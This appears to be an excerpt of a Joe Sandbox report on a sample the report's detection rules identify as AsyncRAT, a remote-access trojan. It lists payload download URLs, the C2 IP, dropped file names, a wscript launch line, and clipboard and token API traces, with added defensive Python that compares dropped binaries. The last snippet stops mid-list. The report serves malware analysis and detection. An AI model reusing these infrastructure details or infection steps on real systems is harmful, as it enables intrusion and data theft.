              Source: choice.exe, 0000001E.00000002.1994159177.0000000003368000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001F.00000002.1953095483.0000000000880000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001F.00000002.1953228086.0000000000A30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000022.00000002.1955469418.0000000003120000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000022.00000002.1955529003.0000000003180000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851243617.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851607256.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3854974817.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.00000000014E2000.00000004.00000020.00020000.00000000.sdmp, c[1].bat.0.dr | String found in binary or memory: https://myguyapp.com/msword.zip
              Source: cmd.exe, 00000022.00000002.1955529003.0000000003180000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zip&Y5=J
              Source: RegAsm.exe, 00000029.00000002.3851904482.00000000014E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipPROCESSOR_ARCHITEW64
              Source: tasklist.exe, 00000016.00000002.1927254392.000000000302F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926535465.000000000302B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926600854.000000000302E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926304834.000000000302B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_$
              Source: RegAsm.exe, 00000029.00000002.3851904482.00000000014E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPR
              Source: Carter.pif, 0000001D.00000002.3852624637.00000000016D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https:8X
              Source: mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/x
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: msword.exe, 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://www.globalsign.com/rea
              Source: msword.exe, 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp | String found in binary or memory: https://www.globalsign.com/reancel
              Source: Carter.pif.20.dr | String found in binary or memory: https://www.globalsign.com/repository/0
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: https://www.globalsign.com/repository/06
              Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknown | HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49713 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002E4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00954830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002E4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002FD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0096D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

              System Summary

              Source: 29.3.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 29.3.Carter.pif.38bceb0.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 41.2.RegAsm.exe.d50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 29.2.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT, Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File dump: msword.exe.13.dr 891289591
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002D4254 CreateFileW,DeviceIoControl,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002C8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002D5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00945778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\DistributionsPit
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\PrintersOngoing
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_0040497C
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_00406ED2
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_004074BB
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0027B020
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002794E0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_00279C80
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002923F5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002F8400
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002A6502
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002A265E
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0027E6F0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0029282A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002A89BF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002F0A3A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002A6A74
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_00280BE0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0029CD51
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002CEDB2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002D8E44
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002F0EB7
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002A6FE6
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002933B7
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0029F409
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0028D45D
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0028F628
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_00271663
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0027F6A0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002916B4
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002978C3
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_00291BA8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0029DBA5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002A9CE5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0028DD28
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_00291FC0
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_0029BFD6
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008EB020
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008E94E0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008E9C80
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_009023F5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00968400
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00916502
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008EE6F0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0091265E
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0090282A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_009189BF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00960A3A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00916A74
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008F0BE0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0093EDB2
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0090CD51
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00960EB7
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00948E44
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00916FE6
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_009033B7
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0090F409
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008FD45D
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_009016B4
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008EF6A0
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008FF628
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008E1663
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_009078C3
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0090DBA5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00901BA8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00919CE5
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_008FDD28
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0090BFD6
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00901FC0
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_0139EC7C
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_01390FC8
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_0570B430
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_0570BD00
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_0570EBB0
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_0570B0E8
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_057072B0
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Code function: 41_2_05700BA0
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\220239\Carter.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: String function: 00281A36 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: String function: 00298B30 appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: String function: 00290D17 appears 70 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: String function: 00908B30 appears 42 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: String function: 008F1A36 appears 34 times
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: String function: 00900D17 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: String function: 004062A3 appears 58 times
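              Carter.pif (PID 29) and DanielPulse.scr (PID 37) list the same function and string-function addresses shifted by one constant, which is what the identical SHA256 reported for the two dropped files predicts: one binary copied under two names and loaded at two bases. The Python below is an added example, not part of the Joe Sandbox report. It takes the two address lists from the rows above and recovers the rebasing delta plus the fraction of functions it explains, the check to run whenever two differently named dropped files are suspected of being the same image.

```python
"""Decide whether two function-address lists are one code layout loaded at two bases.
Added example; the address lists are copied from the report's Code function rows."""
from collections import Counter

# Function start addresses listed for Carter.pif (PID 29) and DanielPulse.scr (PID 37).
CARTER_PIF = [
    0x0027B020, 0x002794E0, 0x00279C80, 0x002923F5, 0x002F8400, 0x002A6502, 0x002A265E, 0x0027E6F0,
    0x0029282A, 0x002A89BF, 0x002F0A3A, 0x002A6A74, 0x00280BE0, 0x0029CD51, 0x002CEDB2, 0x002D8E44,
    0x002F0EB7, 0x002A6FE6, 0x002933B7, 0x0029F409, 0x0028D45D, 0x0028F628, 0x00271663, 0x0027F6A0,
    0x002916B4, 0x002978C3, 0x00291BA8, 0x0029DBA5, 0x002A9CE5, 0x0028DD28, 0x00291FC0, 0x0029BFD6,
]
DANIELPULSE_SCR = [
    0x008EB020, 0x008E94E0, 0x008E9C80, 0x009023F5, 0x00968400, 0x00916502, 0x008EE6F0, 0x0091265E,
    0x0090282A, 0x009189BF, 0x00960A3A, 0x00916A74, 0x008F0BE0, 0x0093EDB2, 0x0090CD51, 0x00960EB7,
    0x00948E44, 0x00916FE6, 0x009033B7, 0x0090F409, 0x008FD45D, 0x009016B4, 0x008EF6A0, 0x008FF628,
    0x008E1663, 0x009078C3, 0x0090DBA5, 0x00901BA8, 0x00919CE5, 0x008FDD28, 0x0090BFD6, 0x00901FC0,
]


def rebase_delta(a, b):
    """Most frequent pairwise difference b - a, and the share of `a` it explains.

    Two copies of one image differ by a constant (the base difference), so the true
    delta collects one vote per function while coincidental differences collect few.
    A ratio near 1.0 means same layout at another base; much lower means a different
    build or a different binary."""
    votes = Counter(y - x for x in a for y in b)
    delta, _ = votes.most_common(1)[0]
    targets = set(b)
    matched = sum(1 for x in a if x + delta in targets)
    return delta, matched / len(a)


def unmatched(a, b, delta):
    """Functions in `a` with no counterpart in `b` once rebased by `delta`."""
    targets = set(b)
    return sorted(x for x in a if x + delta not in targets)


if __name__ == "__main__":
    delta, ratio = rebase_delta(CARTER_PIF, DANIELPULSE_SCR)
    print(f"delta=0x{delta:X} matched={ratio:.0%} "
          f"unmatched={unmatched(CARTER_PIF, DANIELPULSE_SCR, delta)}")
```

              The same delta (0x670000) also relates the three string-function addresses (00281A36/008F1A36, 00298B30/00908B30, 00290D17/00900D17), so every code reference the report lists for PID 37 is the PID 29 binary rebased.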
              Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: 29.3.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.3.Carter.pif.38bceb0.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 41.2.RegAsm.exe.d50000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.2.Carter.pif.38bceb0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
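              Each AsyncRAT row in the two Yara lists above names either an unpacked artifact (29.3.Carter.pif.38bceb0.1.unpack) or a memory dump (0000001D.00000003.….sdmp). The Python below is an added example, not Joe Sandbox tooling: it decodes those identifiers, copied from the rows above, so the hits can be grouped per process and the executable regions separated from the ones that merely hold the payload as data. The PID and stage fields are confirmed by the matching 29.3.Carter.pif / 41.2.RegAsm.exe names (0x1D = 29, 0x29 = 41); that the fifth sdmp field is the Win32 page protection and the seventh the MEM_* region type is an assumption inferred from the values seen here (0x04, 0x40, 0x20000), not something this page documents.

```python
"""Decode Joe Sandbox artifact identifiers from the Yara rows and group hits per PID.
Added example; the protection/type field meanings are assumptions (see comments)."""
import re
from collections import defaultdict

# Identifiers copied from the "Matched rule: Detects AsyncRAT" rows above.
YARA_HITS = [
    "29.3.Carter.pif.38bceb0.1.unpack",
    "29.3.Carter.pif.38bceb0.0.raw.unpack",
    "29.3.Carter.pif.38bceb0.0.unpack",
    "41.2.RegAsm.exe.d50000.0.unpack",
    "29.2.Carter.pif.38bceb0.1.unpack",
    "29.3.Carter.pif.38bceb0.1.raw.unpack",
    "29.2.Carter.pif.38bceb0.1.raw.unpack",
    "0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp",
    "0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp",
    "00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp",
    "0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp",
    "0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp",
    "0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp",
    "0000001D.00000003.3291441566.0000000001128000.00000004.00000800.00020000.00000000.sdmp",
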